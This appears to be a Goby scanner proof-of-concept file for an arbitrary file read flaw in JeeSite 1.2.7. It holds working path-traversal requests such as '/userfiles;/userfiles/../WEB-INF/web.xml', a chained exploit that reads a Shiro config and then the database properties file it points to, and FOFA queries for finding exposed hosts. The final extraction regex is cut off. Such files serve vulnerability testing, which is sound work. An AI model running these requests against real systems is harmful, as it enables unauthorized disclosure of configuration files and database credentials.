Goby/json/JEESITE-V1.2.7-File-Read.json

160 lines
5.0 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "JEESITE V1.2.7 File Read",
"Description": "<p>JeeSite is a high-efficiency, high-performance, and strong security open source Java EE rapid development platform based on a number of excellent open source projects, highly integrated and packaged.</p><p>In JeeSite 1.x version, the UserfilesDownloadServlet function improperly handles the related URL, which leads to the existence of arbitrary file reading vulnerabilities.</p>",
"Product": "JeeSite",
"Homepage": "https://jeesite.com/",
"DisclosureDate": "2021-10-24",
"Author": "sharecast.net@gmail.com",
"FofaQuery": "app=\"JeeSite\"",
"GobyQuery": "app=\"JeeSite\"",
"Level": "2",
"Impact": "<p>In JeeSite 1.x version, the UserfilesDownloadServlet function improperly handles the related URL, which leads to the existence of arbitrary file reading vulnerabilities.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://jeesite.com\">https://jeesite.com</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "JEESITE 快速开发平台 V1.2.7版本任意文件读取漏洞",
"VulType": ["fileread"],
"Tags": ["fileread"],
"Description": "<p>JeeSite是基于多个优秀的开源项目高度整合封装而成的高效高性能强安全性的开源Java EE快速开发平台。</p><p>在JeeSite 1.x版本中由于UserfilesDownloadServlet函数对相关URL处理不当导致其存在任意文件读取漏洞。</p>",
"Impact": "<p>攻击者读取任意文件,导致系统敏感配置文件泄露,进而导致数据库密码或者敏感文件泄露,影响用户数据等风险。</p>",
"Product": "JeeSite",
"Recommendation": "<p>1、更新至4.x版本官方地址</p><p><a href=\"https://jeesite.com/\" rel=\"nofollow\">https://jeesite.com/</a><br></p><p>2、临时解决方案建议使用WAF进行过滤安装参考</p><p><a href=\"https://github.com/SpiderLabs/ModSecurity/wiki\" rel=\"nofollow\">https://github.com/SpiderLabs/ModSecurity/wiki</a></p>"
}
},
"References": [
"http://www.yulegeyu.com/2021/06/19/JEESITE-V1-2-7-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "../WEB-INF/classes/spring-context-shiro.xml",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/userfiles;/userfiles/../WEB-INF/web.xml",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<display-name>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<listener-class>",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/userfiles;/userfiles/{{{cmd}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"conf|lastbody|regex|location=\"classpath:(.*?\\.properties)\""
]
},
{
"Request": {
"method": "GET",
"uri": "/userfiles;/userfiles/../WEB-INF/classes/{{{conf}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([."
]
}
],
"Tags": [
"fileread"
],
"VulType": [
"fileread"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "7",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}